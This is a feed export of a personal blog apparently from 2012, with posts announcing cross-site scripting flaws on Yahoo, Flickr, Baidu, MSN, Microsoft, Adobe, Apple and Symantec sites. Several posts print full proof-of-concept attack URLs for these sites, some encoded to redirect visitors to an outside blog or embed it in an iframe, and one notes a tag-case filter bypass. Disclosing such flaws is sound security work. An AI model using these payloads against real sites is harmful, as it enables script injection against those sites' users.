tag:blogger.com,1999:blog-64174305914054050032024-03-19T03:20:31.909-07:00Hermit RealityOnly dust here...Unknownnoreply@blogger.comBlogger8125tag:blogger.com,1999:blog-6417430591405405003.post-25612552835585404052016-12-10T00:58:00.002-08:002016-12-10T01:00:19.496-08:00<div class="separator" style="clear: both; text-align: center;">
</div>
<h2>
<b>Shadows...</b></h2>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZ_bnqqW0Uho3eB7wqPE6VCRZkIZL48hKyDC2-DNrE-H9gt59lyF1xjxoO7g-MRedbXXq20YQWtSSl8qFmEj8TfUhnQLeX8HQHcDbHIgW9v4To-gP6-oNkjPbQPf0MUKzXkPhL7BLr0Vx/s1600/24417f1b5e8224c791c8b070f03b381c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZ_bnqqW0Uho3eB7wqPE6VCRZkIZL48hKyDC2-DNrE-H9gt59lyF1xjxoO7g-MRedbXXq20YQWtSSl8qFmEj8TfUhnQLeX8HQHcDbHIgW9v4To-gP6-oNkjPbQPf0MUKzXkPhL7BLr0Vx/s400/24417f1b5e8224c791c8b070f03b381c.jpg" width="400" /></a><br />
<br />Unknownnoreply@blogger.comtag:blogger.com,1999:blog-6417430591405405003.post-42668684432047778902012-04-09T20:45:00.000-07:002012-04-09T21:14:13.466-07:00Small note<div style="text-align: center;">
<b>For these that still thinking that those screens from Yahoo are fake/manipulated(there are few people):the answer is very simple-just use "document.write" before "alert" e.g: document.write('something');alert(/another something/.source) if you don't want to disclose content of </b>
<b>the</b>
<b>current page</b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b>Here is example:</b><b><br /></b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/9ymSW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/9ymSW.png" width="355" /></a></div>
<div style="text-align: center;">
<span style="font-size: xx-small;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: xx-small;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: small;"><br /></span></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-6417430591405405003.post-75659085643976612882012-04-08T17:04:00.000-07:002012-04-08T17:04:51.142-07:00Several XSS flaws in different Yahoo! sub-domains<div style="text-align: center;">
<strong>One of these subdomains have a very "strong" filter:<script> is blocked ...but no surprise <ScRipT> is allowed</strong> </div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/X17WA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="http://i.imgur.com/X17WA.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/tmSeM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="331" src="http://i.imgur.com/tmSeM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/A9y7e.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="http://i.imgur.com/A9y7e.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<strong>that's for now...</strong></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />Unknownnoreply@blogger.comtag:blogger.com,1999:blog-6417430591405405003.post-91115017434693630922012-04-05T22:03:00.000-07:002012-04-05T22:03:51.540-07:00Do you believe...<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/UUodX.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://i.imgur.com/UUodX.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/mqafI.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://i.imgur.com/mqafI.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/2QCgV.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://i.imgur.com/2QCgV.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/oLkeu.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://i.imgur.com/oLkeu.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />Unknownnoreply@blogger.comtag:blogger.com,1999:blog-6417430591405405003.post-45689931455407160062012-03-28T12:16:00.000-07:002012-04-02T05:36:06.484-07:00XSS in flickr.com<div style="text-align: center;">
Several days ago,i just found a trivial cross-site scripting vulnerability in flickr.com<br />
<br />
Vulnerability was fixed within a hour after initial report.Thanks to Joshua Cohen (<span style="color: #6fa8dc;">@heyjoshua</span>).<br />
<br />
Some screenshots:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img571.imageshack.us/img571/1815/flickrxss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://img571.imageshack.us/img571/1815/flickrxss.png" width="320" /></a></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img256.imageshack.us/img256/8610/screenshotflickr2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://img256.imageshack.us/img256/8610/screenshotflickr2.png" width="320" /></a></div>
<div style="text-align: center;">
<br /></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-6417430591405405003.post-37487687282891025412012-03-21T19:45:00.000-07:002012-04-04T00:09:21.937-07:00Cross-site scripting flaws in Baidu and MSN<b>Sony </b><b><a href="http://st2tea.blogspot.com/"><span style="color: white;">st2tea.blogspot.com</span></a></b><br />
<b><br /></b><br />
<b>...in baidu.com</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img838.imageshack.us/img838/8264/xssbaidu.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://img838.imageshack.us/img838/8264/xssbaidu.png" width="320" /></a></div>
https://passport.baidu.com/v2/?reg&tpl='"></script><script>alert(String.fromCharCode(88,83,83,32,98,121,32,102,108,101,120,120,112,111,105,110,116,32,38,32,83,111,110,121));location=(String.fromCharCode(104,116,116,112,58,47,47,115,116,50,116,101,97,46,98,108,111,103,115,112,111,116,46,99,111,109))</script><br />
<br />
<b>...in .msn </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img818.imageshack.us/img818/552/msn1xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="http://img818.imageshack.us/img818/552/msn1xss.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
http://fitbie.msn.com/get-fit/videos/?vid="></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com width=900 height=800 ></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img707.imageshack.us/img707/5277/msnxss2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://img707.imageshack.us/img707/5277/msnxss2.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
http://sport.be.msn.com/running/nl/nieuws/article.html?Article_ID='-->"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com height=800 width=850>&utm_source=msn-sportsbox-nl&utm_campaign=sportbe_rss&utm_medium=rss</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img59.imageshack.us/img59/1410/xssmsntw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="http://img59.imageshack.us/img59/1410/xssmsntw.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
http://topics.msn.com.tw/fashion/SearchResult.aspx?d=2"/><script>alert('XSS by flexxpoint and Sony')</script></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b>...simple </b>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-6417430591405405003.post-80277679782010948002012-03-20T08:56:00.000-07:002012-03-21T18:17:14.164-07:00<span style="font-size: small;"><b>I just grab this from Sony's blog..</b>. <b>(:</b></span><br />
<br />
luni, 19 martie 2012<br />
Microsoft.com Cross Site Scripting<br />
# Date: 19.03.2012<br />
# Author: Sony and Flexxpoint<br />
# Web Browser : Mozilla Firefox<br />
# Sony Blog: http://st2tea.blogspot.com<br />
..................................................................<br />
<br />
For Ryuzaki Lawlet:<br />
<br />
http://packetstormsecurity.org/files/110597/Microsoft.com-Cross-Site-Scripting.html<br />
<br />
Demo:<br />
<br />
http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=%22%22%3E%3Cscript%3Ealert%28%22XSS%20by%20Sony%20and%20Flexxpoint%22%29%3C/script%3E%3Cscript%3Ealert%28%22Oh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Uh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22wow..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Microsoft.com%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow!%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/SLcBI3JUKZ4%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1HfiVS6apz9Nf2ivkjYS_J13iTDnixo8WEmZ4h5nyTSfxT-brrXv-VQgGg8Ej23sjBhtBqWv7uyZvn3GnzB75_MXtEcc1apeQ30UDcTaTue_oMcR31_fq9-d5yVxJO187Nbp5hOtplg7C/s400/microsoft.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1HfiVS6apz9Nf2ivkjYS_J13iTDnixo8WEmZ4h5nyTSfxT-brrXv-VQgGg8Ej23sjBhtBqWv7uyZvn3GnzB75_MXtEcc1apeQ30UDcTaTue_oMcR31_fq9-d5yVxJO187Nbp5hOtplg7C/s320/microsoft.JPG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/4kJL2Rt-FKo?feature=player_embedded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />Unknownnoreply@blogger.comtag:blogger.com,1999:blog-6417430591405405003.post-78374573095649192572012-03-17T17:53:00.002-07:002012-03-17T17:53:35.604-07:00Cross-site scripting vulnerabilities in Microsoft,Adobe,Apple and Symantec web sites<strong>Cross-site scripting vulnerability in microsoft.com</strong><strong><br /></strong><br />
<strong><br /></strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img214.imageshack.us/img214/4213/screenshot1832012.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="http://img214.imageshack.us/img214/4213/screenshot1832012.png" width="320" /></a></div>
<strong><br /></strong><br />
Bad fix from Microsoft,the page was xssed for the first time on 07.03.2012(<a href="http://xssed.com/mirror/76904/">mirror</a>) and today is still vulnerable...<br />
<br />
PoC:<br />
<br />
http://www.microsoft.com/en-us/together/possibilities.aspx?a='"--></style><script>confirm(/BAD FIX!/.source);/&b=*/</script><br />
<br />
<strong>Cross-site scripting vulnerability in adobe.com</strong><br />
<strong><br /></strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img829.imageshack.us/img829/2731/screenshot183r.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://img829.imageshack.us/img829/2731/screenshot183r.png" width="320" /></a></div>
<strong><br /></strong><br />
PoC:<strong><br /></strong><br />
<br />
https://www.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert(String.fromCharCode(74,117,115,116,32,97,32,88,83,83,46,46,46))>&code=blackletter&cat=style<br />
<br />
<strong>Cross-site scripting vulnerability in support.apple.com</strong>
<br />
<strong><br /></strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img43.imageshack.us/img43/8107/screenshot18ar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://img43.imageshack.us/img43/8107/screenshot18ar.png" width="320" /></a></div>
<strong><br /></strong><br />
PoC:<strong><br /></strong><br />
<br />
http://support.apple.com/kb/index?page=servicefaq&geo='-alert('xss')-'&product=ipad<br />
<br />
<br />
<a name='more'></a>
<strong>Cross-site scripting vulnerability in symantec.com</strong>
<br />
<strong><br /></strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img201.imageshack.us/img201/4213/screenshot1832012.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="http://img201.imageshack.us/img201/4213/screenshot1832012.png" width="320" /></a></div>
<strong><br /></strong><br />
PoC:<strong><br /></strong><br />
<br />
http://www.symantec.com/business/support/index?page=landing&key='-confirm('xss')-'&locale=en_us<br />
<br />
<br />
<br />Unknownnoreply@blogger.com